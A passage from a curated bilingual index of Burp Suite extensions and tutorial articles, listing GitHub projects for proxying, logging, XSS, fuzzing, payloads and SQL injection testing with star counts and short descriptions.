[peacand/burp-pytemplate](https://github.com/peacand/burp-pytemplate) Burp extension to quickly and easily develop Python complex exploits based on Burp proxy requests. - [**30**星][2y] [Py] [aurainfosec/burp-multi-browser-highlighting](https://github.com/aurainfosec/burp-multi-browser-highlighting) Highlight Burp proxy requests made by different browsers - [**29**星][2y] [Java] [ibey0nd/nstproxy](https://github.com/ibey0nd/nstproxy) 一款存储HTTP请求入库的burpsuite插件 - [**27**星][2y] [Py] [mrts/burp-suite-http-proxy-history-converter](https://github.com/mrts/burp-suite-http-proxy-history-converter) Python script that converts Burp Suite HTTP proxy history files to CSV or HTML - [**26**星][7m] [Java] [static-flow/directoryimporter](https://github.com/static-flow/directoryimporter) a Burpsuite plugin built to enable you to import your directory bruteforcing results into burp for easy viewing later. This is an alternative to proxying bruteforcing tools through burp to catch the results. - [**22**星][3y] [Swift] [melvinsh/burptoggle](https://github.com/melvinsh/burptoggle) Status bar application for OS X to toggle the state of the system HTTP/HTTPS proxy. - [**17**星][2y] [Java] [portswigger/j2ee-scan](https://github.com/portswigger/j2ee-scan) J2EEScan is a plugin for Burp Suite Proxy. The goal of this plugin is to improve the test coverage during web application penetration tests on J2EE applications. - [**13**星][4y] [Java] [retanoj/burpmultiproxy](https://github.com/retanoj/burpmultiproxy) Burpsuite 切换代理插件 - [**11**星][8y] [Java] [gdssecurity/deflate-burp-plugin](https://github.com/gdssecurity/deflate-burp-plugin) The Deflate Burp Plugin is a plug-in for Burp Proxy (it implements the IBurpExtender interface) that decompresses HTTP response content in the ZLIB (RFC1950) and DEFLATE (RFC1951) compression formats. - [**11**星][4y] [Py] [vincd/burpproxypacextension](https://github.com/vincd/burpproxypacextension) Exemple d'extension Burp permettant d'utiliser les fichiers de configuration de proxy PAC - [**8**星][2y] [Py] [andresriancho/burp-proxy-search](https://github.com/andresriancho/burp-proxy-search) Burp suite HTTP history advanced search - [**6**星][2y] [Java] [secureskytechnology/burpextender-proxyhistory-webui](https://github.com/secureskytechnology/burpextender-proxyhistory-webui) Burp Extender . Proxy History viewer in Web UI - [**5**星][3y] [Java] [mrts/burp-suite-http-proxy-history-viewer](https://github.com/mrts/burp-suite-http-proxy-history-viewer) Burp Suite HTTP proxy history viewer - [**5**星][3y] [Java] [netspi/jsws](https://github.com/netspi/jsws) JavaScript Web Service Proxy Burp Plugin - [**3**星][2y] [Kotlin] [pajswigger/filter-options](https://github.com/pajswigger/filter-options) Burp extension to filter OPTIONS requests from proxy history - [**2**星][1y] [Java] [coastalhacking/burp-pac](https://github.com/coastalhacking/burp-pac) Burp Proxy Auto-config Extension *** ## <a id="19f0f074fc013e6060e96568076b7c9a"></a>日志 - [**496**星][2m] [Py] [romanzaikin/burpextension-whatsapp-decryption-checkpoint](https://github.com/romanzaikin/burpextension-whatsapp-decryption-checkpoint) Burp extension to decrypt WhatsApp Protocol - [**239**星][1y] [Java] [nccgroup/burpsuiteloggerplusplus](https://github.com/nccgroup/burpsuiteloggerplusplus) Burp Suite Logger++: Log activities of all the tools in Burp Suite - [**93**星][2y] [Py] [debasishm89/burpy](https://github.com/debasishm89/burpy) parses Burp Suite log and performs various tests depending on the module provided and finally generate a HTML report. - [**63**星][4y] [Py] [tony1016/burplogfilter](https://github.com/tony1016/burplogfilter) A python3 program to filter Burp Suite log file. - [**43**星][1y] [Py] [bayotop/sink-logger](https://github.com/bayotop/sink-logger) Burp扩展,无缝记录所有传递到已知JavaScript sinks的数据 - [**32**星][3m] [Java] [righettod/log-requests-to-sqlite](https://github.com/righettod/log-requests-to-sqlite) BURP extension to record every HTTP request send via BURP and create an audit trail log of an assessment. - [**5**星][8m] [Java] [logicaltrust/burphttpmock](https://github.com/logicaltrust/burphttpmock) This Burp extension provides mock responses based on the real ones. - [**3**星][1y] [Java] [ax/burp-logs](https://github.com/ax/burp-logs) Logs is a Burp Suite extension to work with log files. - [**0**星][3y] [Java] [silentsignal/burp-sqlite-logger](https://github.com/silentsignal/burp-sqlite-logger) SQLite logger for Burp Suite - 重复区段: [工具->SQL](#0481f52a7f7ee969fa5834227e49412e) | *** ## <a id="7a78bdcffe72cd39b193d93aaec80289"></a>XSS - [**301**星][1y] [Java] [elkokc/reflector](https://github.com/elkokc/reflector) Burp 插件,浏览网页时实时查找反射 XSS - [**301**星][3y] [Java] [nvisium/xssvalidator](https://github.com/nvisium/xssvalidator) This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities. - [**163**星][3m] [Py] [wish-i-was/femida](https://github.com/wish-i-was/femida) Automated blind-xss search for Burp Suite - [**101**星][1y] [Java] [mystech7/burp-hunter](https://github.com/mystech7/burp-hunter) XSS Hunter Burp Plugin - [**44**星][7m] [Py] [bitthebyte/bitblinder](https://github.com/bitthebyte/bitblinder) Burp extension helps in finding blind xss vulnerabilities - [**34**星][3y] [Py] [attackercan/burp-xss-sql-plugin](https://github.com/attackercan/burp-xss-sql-plugin) Burp plugin which I used for years which helped me to find several bugbounty-worthy XSSes, OpenRedirects and SQLi. - [**30**星][14d] [JS] [psych0tr1a/elscripto](https://github.com/psych0tr1a/elscripto) XSS explot kit/Blind XSS framework/BurpSuite extension - [**27**星][3y] [Java] [portswigger/xss-validator](https://github.com/portswigger/xss-validator) This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities. - [**23**星][9m] [Py] [hpd0ger/supertags](https://github.com/hpd0ger/supertags) 一个Burpsuite插件,用于检测隐藏的XSS - [**22**星][1y] [Py] [jiangsir404/xss-sql-fuzz](https://github.com/jiangsir404/xss-sql-fuzz) burpsuite 插件对GP所有参数(过滤特殊参数)一键自动添加xss sql payload 进行fuzz - 重复区段: [工具->Fuzz](#e9a969fc073afb5add0b75607e43def0) |[工具->SQL](#0481f52a7f7ee969fa5834227e49412e) | - [**2**星][1y] [Java] [conanjun/xssblindinjector](https://github.com/conanjun/xssblindinjector) burp插件,实现自动化xss盲打以及xss log *** ## <a id="e0b6358d9096e96238b76258482a1c2f"></a>Collaborator - [**88**星][2y] [Java] [federicodotta/handycollaborator](https://github.com/federicodotta/handycollaborator) Burp Suite plugin created for using Collaborator tool during manual testing in a comfortable way! - [**68**星][3m] [Java] [netspi/burpcollaboratordnstunnel](https://github.com/netspi/burpcollaboratordnstunnel) A DNS tunnel utilizing the Burp Collaborator - [**39**星][2y] [Java] [bit4woo/burp_collaborator_http_api](https://github.com/bit4woo/burp_collaborator_http_api) 基于Burp Collaborator的HTTP API - [**31**星][3y] [Java] [silentsignal/burp-collab-gw](https://github.com/silentsignal/burp-collab-gw) Simple socket-based gateway to the Burp Collaborator - [**30**星][2m] [Shell] [putsi/privatecollaborator](https://github.com/putsi/privatecollaborator) A script for installing private Burp Collaborator with free Let's Encrypt SSL-certificate - [**25**星][27d] [Java] [portswigger/taborator](https://github.com/portswigger/taborator) A Burp extension to show the Collaborator client in a tab - [**17**星][2y] [HCL] [4armed/terraform-burp-collaborator](https://github.com/4armed/terraform-burp-collaborator) Terraform configuration to build a Burp Private Collaborator Server - [**8**星][27d] [Java] [hackvertor/taborator](https://github.com/hackvertor/taborator) A Burp extension to show the Collaborator client in a tab *** ## <a id="e9a969fc073afb5add0b75607e43def0"></a>Fuzz - [**209**星][3m] [Java] [h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) ZAP/Burp plugin that generate script to reproduce a specific HTTP request (Intended for fuzzing or scripted attacks) - [**62**星][5m] [Py] [pinnace/burp-jwt-fuzzhelper-extension](https://github.com/pinnace/burp-jwt-fuzzhelper-extension) Burp扩展, 用于Fuzzing JWT - [**54**星][3y] [Py] [mseclab/burp-pyjfuzz](https://github.com/mseclab/burp-pyjfuzz) Burp Suite plugin which implement PyJFuzz for fuzzing web application. - [**38**星][3y] [team-firebugs/burp-lfi-tests](https://github.com/team-firebugs/burp-lfi-tests) Fuzzing for LFI using Burpsuite - [**28**星][3y] [Py] [floyd-fuh/burp-httpfuzzer](https://github.com/floyd-fuh/burp-httpfuzzer) Burp plugin to do random fuzzing of HTTP requests - [**22**星][1y] [Py] [jiangsir404/xss-sql-fuzz](https://github.com/jiangsir404/xss-sql-fuzz) burpsuite 插件对GP所有参数(过滤特殊参数)一键自动添加xss sql payload 进行fuzz - 重复区段: [工具->XSS](#7a78bdcffe72cd39b193d93aaec80289) |[工具->SQL](#0481f52a7f7ee969fa5834227e49412e) | - [**18**星][1y] [Py] [mgeeky/burpcontextawarefuzzer](https://github.com/mgeeky/burpcontextawarefuzzer) BurpSuite's payload-generation extension aiming at applying fuzzed test-cases depending on the type of payload (integer, string, path; JSON; XML; GWT; binary) and following encoding-scheme applied originally. - [**18**星][7y] [raz0r/burp-radamsa](https://github.com/raz0r/burp-radamsa) Radamsa fuzzer extension for Burp Suite - [**11**星][3y] [Java] [portswigger/reissue-request-scripter](https://github.com/portswigger/reissue-request-scripter) ZAP/Burp plugin that generate script to reproduce a specific HTTP request (Intended for fuzzing or scripted attacks) - [**4**星][2y] [Java] [huvuqu/fuzz18plus](https://github.com/huvuqu/fuzz18plus) Advance of fuzzing for Web pentest. Based on Burp extension, send HTTP request template out to Python fuzzer. - [**1**星][5m] [Kotlin] [gosecure/burp-fuzzy-encoding-generator](https://github.com/gosecure/burp-fuzzy-encoding-generator) Quickly test various encoding for a given value in Burp Intruder *** ## <a id="fc5f535e219ba9694bb72df4c11b32bd"></a>Payload - [**423**星][6m] [Java] [bit4woo/recaptcha](https://github.com/bit4woo/recaptcha) 自动识别图形验证码并用于burp intruder爆破模块的插件 - [**152**星][4y] [trietptm/sql-injection-payloads](https://github.com/trietptm/sql-injection-payloads) SQL Injection Payloads for Burp Suite, OWASP Zed Attack Proxy,... - 重复区段: [工具->SQL](#0481f52a7f7ee969fa5834227e49412e) | - [**70**星][2y] [Java] [ikkisoft/bradamsa](https://github.com/ikkisoft/bradamsa) Burp Suite extension to generate Intruder payloads using Radamsa - [**56**星][1y] [Py] [destine21/zipfileraider](https://github.com/destine21/zipfileraider) ZIP File Raider - Burp Extension for ZIP File Payload Testing - [**55**星][2y] [Java] [righettod/virtualhost-payload-generator](https://github.com/righettod/virtualhost-payload-generator) BURP extension providing a set of values for the HTTP request "Host" header for the "BURP Intruder" in order to abuse virtual host resolution. - [**32**星][3y] [tdifg/payloads](https://github.com/tdifg/payloads) for burp - [**19**星][4y] [Java] [lgrangeia/aesburp](https://github.com/lgrangeia/aesburp) Burp Extension to manipulate AES encrypted payloads - [**17**星][3m] [thehackingsage/burpsuite](https://github.com/thehackingsage/burpsuite) BurpSuite Pro, Plugins and Payloads - [**16**星][3y] [Java] [portswigger/java-serialized-payloads](https://github.com/portswigger/java-serialized-payloads) YSOSERIAL Integration with burp suite - [**12**星][2m] [Java] [tmendo/burpintruderfilepayloadgenerator](https://github.com/tmendo/burpintruderfilepayloadgenerator) Burp Intruder File Payload Generator - [**10**星][2y] [antichown/burp-payloads](https://github.com/antichown/burp-payloads) Burp Payloads - [**5**星][4y] [Java] [antoinet/burp-decompressor](https://github.com/antoinet/burp-decompressor) An extension for BurpSuite used to access and modify compressed HTTP payloads without changing the content-encoding. - [**5**星][5y] [Py] [enablesecurity/burp-luhn-payload-processor](https://github.com/enablesecurity/burp-luhn-payload-processor) A plugin for Burp Suite Pro to work with attacker payloads and automatically generate check digits for credit card numbers and similar numbers that end with a check digit generated using the Luhn algorithm or formula (also known as the "modulus 10" or "mod 10" algorithm). - [**3**星][7y] [Py] [infodel/burp.extension-payloadparser](https://github.com/infodel/burp.extension-payloadparser) Burp Extension for parsing payloads containing/excluding characters you provide. - [**3**星][2y] [Java] [pan-lu/recaptcha](https://github.com/pan-lu/recaptcha) A Burp Extender that auto recognize CAPTCHA and use for Intruder payload *** ## <a id="0481f52a7f7ee969fa5834227e49412e"></a>SQL - [**381**星][1y] [Py] [rhinosecuritylabs/sleuthql](https://github.com/rhinosecuritylabs/sleuthql) Python3 Burp History parsing tool to discover potential SQL injection points. To be used in tandem with SQLmap. - [**235**星][1y] [Java] [difcareer/sqlmap4burp](https://github.com/difcareer/sqlmap4burp) sqlmap embed in burpsuite - [**174**星][2m] [Py] [codewatchorg/sqlipy](https://github.com/codewatchorg/sqlipy) Burp Suite 插件, 使用 SQLMap API 集成SQLMap - [**152**星][4y] [trietptm/sql-injection-payloads](https://github.com/trietptm/sql-injection-payloads) SQL Injection Payloads for Burp Suite, OWASP Zed Attack Proxy,... - 重复区段: [工具->Payload](#fc5f535e219ba9694bb72df4c11b32bd) | - [**109**星][2m] [Java] [c0ny1/sqlmap4burp-plus-plus](https://github.com/c0ny1/sqlmap4burp-plus-plus) 一款兼容Windows,mac,linux多个系统平台的Burp与sqlmap联动插件 - [**24**星][2m] [Py] [portswigger/sqli-py](https://github.com/portswigger/sqli-py) a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API. - [**22**星][1y] [Py] [jiangsir404/xss-sql-fuzz](https://github.com/jiangsir404/xss-sql-fuzz) burpsuite 插件对GP所有参数(过滤特殊参数)一键自动添加xss sql payload 进行fuzz - 重复区段: [工具->XSS](#7a78bdcffe72cd39b193d93aaec80289) |[工具->Fuzz](#e9a969fc073afb5add0b75607e43def0) | - [**22**星][7y] [Py] [milo2012/burpsql](https://github.com/milo2012/burpsql) Automating SQL injection using Burp Proxy Logs and SQLMap - [**8**星][8m] [Py] [orleven/burpcollect](https://github.com/orleven/burpcollect) 基于BurpCollector的二次开发, 记录Burpsuite Site Map记录的里的数据包中的目录路径参数名信息,并存入Sqlite,并可导出txt文件。 - [**0**星][3y] [Java] [silentsignal/burp-sqlite-logger](https://github.com/silentsignal/burp-sqlite-logger) SQLite logger for Burp Suite - 重复区段: [工具->日志](#19f0f074fc013e6060e96568076b7c9a) | *** ## <a id="33431f1a7baa0f6193334ef4d74ff82c"></a>Android - [**274**星][2y] [Java] [mateuszk87/badintent](https://github.com/mateuszk87/badintent) Intercept, modify, repeat and attack Android's Binder transactions using Burp Suite - [**9**星][4m] [JS] [shahidcodes/android-nougat-ssl-intercept](https://github.com/shahidcodes/android-nougat-ssl-intercept) It decompiles target apk and adds security exception to accept all certificates thus making able to work with Burp/Charles and Other Tools *** ## <a id="01a878dcb14c47e0a1d05dc36ab95bfc"></a>其他 - [**584**星][1y] [Java] [federicodotta/brida](https://github.com/federicodotta/brida) The new bridge between Burp Suite and Frida! - [**354**星][2y] [Shell] [koenbuyens/kalirouter](https://github.com/koenbuyens/kalirouter) 将 KaliLinux 主机转变为路由器,使用 Wireshark 记录所有的网络流量,同时将 HTTP/HTTPS 流量发送到其他主机的拦截代理(例如 BurpSuite) - [**298**星][1y] [Shell] [yw9381/burp_suite_doc_zh_cn](https://github.com/yw9381/burp_suite_doc_zh_cn) 这是基于Burp Suite官方文档翻译而来的中文版文档 - [**230**星][1y] [Py] [audibleblink/doxycannon](https://github.com/audibleblink/doxycannon) 为一堆OpenVPN文件分别创建Docker容器, 每个容器开启SOCKS5代理服务器并绑定至Docker主机端口, 再结合使用Burp或ProxyChains, 构建私有的Botnet - [**219**星][10m] [Py] [teag1e/burpcollector](https://github.com/teag1e/burpcollector) 通过BurpSuite来构建自己的爆破字典,可以通过字典爆破来发现隐藏资产。 - [**141**星][6m] [Py] [integrity-sa/burpcollaborator-docker](https://github.com/integrity-sa/burpcollaborator-docker) a set of scripts to install a Burp Collaborator Server in a docker environment, using a LetsEncrypt wildcard certificate - [**130**星][7m] [Go] [empijei/wapty](https://github.com/empijei/wapty) Go语言编写的Burp的替代品。(已不再维护) - [**121**星][2m] [cujanovic/content-bruteforcing-wordlist](https://github.com/cujanovic/content-bruteforcing-wordlist) Wordlist for content(directory) bruteforce discovering with Burp or dirsearch - [**77**星][1m] [Go] [root4loot/rescope](https://github.com/root4loot/rescope) defining scopes for Burp Suite and OWASP ZAP. - [**64**星][3m] [Java] [aress31/swurg](https://github.com/aress31/swurg) Parse OpenAPI documents into Burp Suite for automating OpenAPI-based APIs security assessments - [**12**星][30d] [boreas514/burp-suite-2.0-chinese-document](https://github.com/boreas514/burp-suite-2.0-chinese-document) 中文版burp2.0官方文档 - [**0**星][3y] [fbogner/burp.app](https://github.com/fbogner/burp.app) A small AppleScript wrapper application around Burp.jar to make it more OS X like # <a id="dab83e734c8176aae854176552bff628"></a>文章 *** ## <a id="ad95cb0314046788911641086ec4d674"></a>新添加 - 2019.12 [aliyun] [如何利用xray、burp、lsc构成自动化挖src平台](https://xz.aliyun.com/t/7007) - 2019.12 [parsiya] [Developing and Debugging Java Burp Extensions with Visual Studio Code](https://parsiya.net/blog/2019-12-02-developing-and-debugging-java-burp-extensions-with-visual-studio-code/) - 2019.11 [parsiya] [Swing in Python Burp Extensions - Part 3 - Tips and Tricks](https://parsiya.net/blog/2019-11-26-swing-in-python-burp-extensions-part-3-tips-and-tricks/) - 2019.11 [parsiya] [Swing in Python Burp Extensions - Part 2 - NetBeans and TableModels](https://parsiya.net/blog/2019-11-11-swing-in-python-burp-extensions-part-2-netbeans-and-tablemodels/) - 2019.11 [parsiya] [Swing in Python Burp Extensions - Part 1](https://parsiya.net/blog/2019-11-04-swing-in-python-burp-extensions-part-1/) - 2019.10 [KacperSzurek] [[BURP] Intruder: Jak sprawdzić typ konta?](https://www.youtube.com/watch?v=K1_3WFA3Dmc) - 2019.10 [KacperSzurek] [[BURP] 12 trików do Burp Repeater](https://www.youtube.com/watch?v=-M4bh94Mfyc) - 2019.10 [parsiya] [Quality of Life Tips and Tricks - Burp Suite](https://parsiya.net/blog/2019-10-13-quality-of-life-tips-and-tricks-burp-suite/) - 2019.10 [freebuf] [使用Burp拦截Flutter App与其后端的通信](https://www.freebuf.com/articles/terminal/213346.html) - 2019.10 [KacperSzurek] [[BURP] Jak stworzyć makro do odświeżania sesji?](https://www.youtube.com/watch?v=d1lg2WGzvW4) - 2019.09 [BrokenSecurity] [036 part of Ethical Hacking - Burpsuite login bruteforce](https://www.youtube.com/watch?v=b1ggBAk2yDE) - 2019.09 [BrokenSecurity] [033 part of Ethical Hacking - Editing packets in Burpsuite](https://www.youtube.com/watch?v=o8yLE8Ls81I) - 2019.09 [BrokenSecurity] [032 part of Ethical Hacking - Burpsuite configuration](https://www.youtube.com/watch?v=m_SLme98650) - 2019.09 [aliyun] [BurpSuite插件 - AutoRepeater说明](https://xz.aliyun.com/t/6244) - 2019.09 [radekk] [Firefox and Burp Suite — the most secure configuration](https://medium.com/p/3c08e6c23194) - 2019.08 [nviso] [Using Burp’s session Handling Rules to insert authorization cookies into Intruder, Repeater and even sqlmap](https://blog.nviso.be/2019/08/29/using-burps-session-handling-rules-to-insert-authorization-cookies-into-intruderrepeater-and-even-sqlmap/) - 2019.08 [arbazhussain] [LinkDumper Burp Plugin](https://medium.com/p/6bde89937646) - 2019.08 [chawdamrunal] [How i exploit out-of-band resource load (HTTP) using burp suite extension plugin (taborator)](https://medium.com/p/2c5065d6a50b) - 2019.07 [0x00sec] [Doubt with header. Burp & Tamper](https://0x00sec.org/t/doubt-with-header-burp-tamper/15197) - 2019.06 [appsecconsulting] [Ten Useful Burp Suite Pro Extensions for Web Application Testing](https://appsecconsulting.com/blog/ten-useful-burp-suite-pro-extensions-for-web-application-testing) - 2019.06 [bugbountywriteup] [Deploy a private Burp Collaborator Server in Azure](https://medium.com/p/f0d932ae1d70) - 2019.06 [infosecinstitute] [Intercepting HTTPS traffic with Burp Suite](https://resources.infosecinstitute.com/intercepting-https-traffic-with-burp-suite/) - 2019.06 [0x00sec] [Achieving Persistent Access to Burp Collaborator Sessions](https://0x00sec.org/t/achieving-persistent-access-to-burp-collaborator-sessions/14311) - 2019.06 [bugbountywriteup] [Digging Android Applications — Part 1 — Drozer + Burp](https://medium.com/p/4fd4730d1cf2) - 2019.06 [NetworkHeros] [Bug Bounty : BurpSuite Professional v2.0.11 Free and Set up for Proxy Intercept](https://www.youtube.com/watch?v=m7o-qIYzLt0) - 2019.05 [web] [Scanning TLS Server Configurations with Burp Suite](https://web-in-security.blogspot.com/2019/05/scanning-tls-server-configurations-with.html) - 2019.05 [infosecaddicts] [Burp Suite](https://infosecaddicts.com/burp-suite-2/) - 2019.04 [parsiya] [Disabling Burp's Update Screen - Part 1 - Analysis and Failures](https://parsiya.net/blog/2019-04-21-disabling-burps-update-screen-part-1-analysis-and-failures/) - 2019.04 [parsiya] [Disabling Burp's Update Screen - Part 1 - Analysis and Failures](https://parsiya.net/blog/2019-04-21-disabling-burps-update-screen---part-1---analysis-and-failures/) - 2019.04 [parsiya] [Hiding OPTIONS - An Adventure in Dealing with Burp Proxy in an Extension](https://parsiya.net/blog/2019-04-06-hiding-options-an-adventure-in-dealing-with-burp-proxy-in-an-extension/) - 2019.04 [parsiya] [Hiding OPTIONS - An Adventure in Dealing with Burp Proxy in an Extension](https://parsiya.net/blog/2019-04-06-hiding-options---an-adventure-in-dealing-with-burp-proxy-in-an-extension/) - 2019.02 [infosecinstitute] [Quick and Dirty BurpSuite Tutorial (2019 Update)](https://resources.infosecinstitute.com/burpsuite-tutorial/) - 2019.02 [pentestpartners] [Burp HMAC header extensions, a how-to](https://www.pentestpartners.com/security-blog/burp-hmac-header-extensions-a-how-to/) - 2019.01 [freebuf] [详细讲解 | 利用python开发Burp Suite插件(二)](https://www.freebuf.com/articles/web/193950.html) - 2019.01 [nxadmin] [Android 7.0+手机burpsuite抓包https](http://www.nxadmin.com/tools/1733.html) - 2019.01 [freebuf] [详细讲解 | 利用python开发Burp Suite插件(一)](https://www.freebuf.com/news/193657.html) - 2019.01 [freebuf] [Burpsuite Collaborato模块详解](https://www.freebuf.com/news/193447.html) - 2019.01 [4hou] [利用Python编写具有加密和解密功能的Burp插件 (下)](http://www.4hou.com/technology/15502.html) - 2019.01 [4hou] [利用Python编写具有加密和解密功能的Burp插件 (上)](http://www.4hou.com/technology/15501.html) - 2019.01 [aliyun] [使用Burp Suite 宏自动化处理 Session 会话](https://xz.aliyun.com/t/3751) - 2019.01 [sans] [Extending Burp to Find Struts and XXE Vulnerabilities](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1542133744.pdf) - 2018.12 [parsiya] [Cryptography in Python Burp Extensions](https://parsiya.net/blog/2018-12-24-cryptography-in-python-burp-extensions/) - 2018.12 [parsiya] [Python Utility Modules for Burp Extensions](https://parsiya.net/blog/2018-12-19-python-utility-modules-for-burp-extensions/) - 2018.12 [ecforce] [创建Burp扩展, 使用HMAC签名替换HTTP Header](https://www.secforce.com/blog/2018/12/burp-extension-hmac-signature-in-custom-http-header/) - 2018.12 [parsiya] [使用Burp的网站地图比较功能, 检测强制浏览/访问控制/直接对象引用等问题](https://parsiya.net/blog/2018-12-17-tiredful-api---part-2---comparing-site-maps-with-burp/) - 2018.12 [parsiya] [Tiredful API - Part 2 - Comparing Site Maps with Burp](https://parsiya.net/blog/2018-12-17-tiredful-api-part-2-comparing-site-maps-with-burp/) - 2018.12 [parsiya] [Tiredful API - Part 1 - Burp Session Validation with Macros](https://parsiya.net/blog/2018-12-11-tiredful-api-part-1-burp-session-validation-with-macros/) - 2018.12 [4hou] [通过Burp Macros自动化平台对Web应用的模糊输入进行处理](http://www.4hou.com/web/14930.html) - 2018.12 [parsiya] [Tiredful API. Part1: 使用宏验证Burp会话](https://parsiya.net/blog/2018-12-11-tiredful-api---part-1---burp-session-validation-with-macros/) - 2018.12 [doyler] [Proxy Android Apps through Burp for Mobile Assessments](https://www.doyler.net/security-not-included/proxy-android-apps-through-burp) - 2018.12 [mindpointgroup] [REST Assured: Penetration Testing REST APIs Using Burp Suite: Part 3 – Reporting](https://www.mindpointgroup.com/blog/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-3-reporting/) - 2018.11 [wallarm] [FAST or Burp or both?](https://medium.com/p/e61a935c9aca) - 2018.11 [arbazhussain] [Broken Link Hijacking Burp Plugin](https://medium.com/p/6918d922c3fb) - 2018.11 [4hou] [利用burp插件Hackvertor绕过waf并破解XOR加密](http://www.4hou.com/tools/14353.html) - 2018.11 [mindpointgroup] [使用Burp对REST API进行渗透测试. Part2](https://www.mindpointgroup.com/blog/pen-test/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-2-testing/) - 2018.11 [pediy] [[原创]利用BurpSuite到SQLMap批量测试SQL注入](https://bbs.pediy.com/thread-247775.htm) - 2018.11 [vanimpe] [Hunt for devices with default passwords (with Burp)](https://www.vanimpe.eu/2018/11/12/hunt-for-devices-with-default-passwords-with-burp/) - 2018.11 [d0znpp] [Extending fuzzing with Burp by FAST](https://medium.com/p/f67d8b5d63e7) - 2018.11 [jerrygamblin] [Automatically Create Github Issues From Burp 2.0](https://jerrygamblin.com/2018/11/07/automatically-create-github-issues-from-burp-2-0/) - 2018.11 [mindpointgroup] [使用Burp Suite对REST API进行渗透测试. Part1:介绍与配置](https://www.mindpointgroup.com/blog/pen-test/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-1-introduction-configuration/) - 2018.11 [doyensec] [Introducing burp-rest-api v2](https://blog.doyensec.com/2018/11/05/burp-rest-api-v2.html) - 2018.10 [valerio] [MITM using arpspoof + Burp or mitmproxy on Kali Linux](https://medium.com/p/95213ff60304) - 2018.10 [portswigger] [Burp 2.0: How do I throttle requests? | Blog](https://portswigger.net/blog/burp-2-0-how-do-i-throttle-requests) - 2018.10 [portswigger] [Burp 2.0: Where is live scanning? | Blog](https://portswigger.net/blog/burp-2-0-where-is-live-scanning) - 2018.10 [portswigger] [Burp 2.0: How do I scan individual items? | Blog](https://portswigger.net/blog/burp-2-0-how-do-i-scan-individual-items) - 2018.10 [portswigger] [Burp 2.0: Where is the scan queue? | Blog](https://portswigger.net/blog/burp-2-0-where-is-the-scan-queue) - 2018.10 [MastersInEthicalHacking] [An Introduction To Burp Suite Tool In Hindi](https://www.youtube.com/watch?v=NIxy8rLQ4zI) - 2018.10 [portswigger] [Burp 2.0: Where are the Spider and Scanner? | Blog](https://portswigger.net/blog/burp-2-0-where-are-the-spider-and-scanner) - 2018.09 [4hou] [使用Burp和Ysoserial实现Java反序列化漏洞的盲利用](http://www.4hou.com/technology/13440.html) - 2018.08 [portswigger] [Burp Suite Enterprise Edition beta now available | Blog](https://portswigger.net/blog/burp-suite-enterprise-edition-beta-now-available) - 2018.08 [jerrygamblin] [Bulk Bug Bounty Scanning With The Burp 2.0 API](https://jerrygamblin.com/2018/08/30/bulk-bug-bounty-scanning-with-the-burp-2-0-api/) - 2018.08 [4hou] [Burp Extractor扩展工具介绍](http://www.4hou.com/tools/12985.html) - 2018.08 [aliyun] [BurpSuite Extender之巧用Marco和Extractor绕过Token限制](https://xz.aliyun.com/t/2547) - 2018.08 [netspi] [Introducing Burp Extractor](https://blog.netspi.com/introducing-burp-extractor/) - 2018.08 [portswigger] [Burp's new crawler | Blog](https://portswigger.net/blog/burps-new-crawler) - 2018.07 [cqureacademy] [How To Burp With Confidence – Our 5 Favorite Features](https://cqureacademy.com/blog/penetration-testing/how-to-burp-our-5-favorite-features) - 2018.07 [freebuf] [使用VirtualBox,INetSim和Burp建立自己的恶意软件分析实验环境](http://www.freebuf.com/articles/system/177601.html) - 2018.07 [web] [Support for XXE attacks in SAML in our Burp Suite extension](https://web-in-security.blogspot.com/2018/07/support-for-xxe-attacks-in-saml-in-our.html) - 2018.06 [bugbountywriteup] [How to brute force efficiently without Burp Pro](https://medium.com/p/1bb2a414a09f) - 2018.06 [finnwea] [An efficiency improvement for Burp Suite](https://finnwea.com/blog/an-efficiency-improvement-for-burp-suite/) - 2018.06 [finnwea] [An efficiency improvement for Burp Suite](https://tij.me/blog/an-efficiency-improvement-for-burp-suite/) - 2018.06 [hackers] [Online Password Cracking with THC-Hydra and BurpSuite](https://www.hackers-arise.com/single-post/2018/06/21/Online-Password-Cracking-with-THC-Hydra-and-BurpSuite) - 2018.06 [integrity] [CVE-2018-10377 - Insufficient Validation of Burp Collaborator Server Certificate](https://labs.integrity.pt/advisories/cve-2018-10377/) - 2018.06 [NetworkHeros] [Ethical Hacking (CEHv10) :Intercept HTTPS (SSL) traffic with Burpsuite](https://www.youtube.com/watch?v=rhJcRqgScz8) - 2018.06 [NetworkHeros] [Ethical Hacking (CEHv10): BurpSuite install and configure proxy](https://www.youtube.com/watch?v=tK_nCYWbbOc) - 2018.05 [hackerone] [New Hacker101 Content: Threat modeling, Burp basics, and more](https://www.hackerone.com/blog/New-Hacker101-Content-Threat-modeling-Burp-basics-and-more) - 2018.05 [aliyun] [基于Burp Collaborator的HTTP API](https://xz.aliyun.com/t/2353) - 2018.05 [freebuf] [Burpsuit结合SQLMapAPI产生的批量注入插件(X10)](http://www.freebuf.com/articles/web/171622.html) - 2018.05 [tevora] [Blind Command Injection Testing with Burp Collaborator](http://threat.tevora.com/stop-collaborate-and-listen/) - 2018.05 [pentestingexperts] [Minesweeper – A Burpsuite plugin (BApp) to aid in the detection of cryptocurrency mining domains (cryptojacking)](http://www.pentestingexperts.com/minesweeper-a-burpsuite-plugin-bapp-to-aid-in-the-detection-of-cryptocurrency-mining-domains-cryptojacking/) - 2018.05 [freebuf] [Burp Xss Scanner插件开发思路分享(附下载)](http://www.freebuf.com/articles/web/170884.html) - 2018.05 [thief] [burpsuite插件开发之检测越权访问漏洞](https://thief.one/2018/05/04/1/) - 2018.05 [freebuf] [Burpsuit结合SQLMapAPI产生的批量注入插件](http://www.freebuf.com/articles/web/169727.html) - 2018.04 [PNPtutorials] [Burpsuite Tutorial for Beginners: Learn Burpsuite from Scratch](https://www.youtube.com/watch?v=BaN89Te85W4) - 2018.04 [freebuf] [实现一个简单的Burp验证码本地识别插件](http://www.freebuf.com/articles/web/168679.html) - 2018.04 [dustri] [Confusing Burp's display with fake encoding](https://dustri.org/b/confusing-burps-display-with-fake-encoding.html) - 2018.04 [aliyun] [如何搭建自己的 Burp Collaborator 服务器](https://xz.aliyun.com/t/2267) - 2018.04 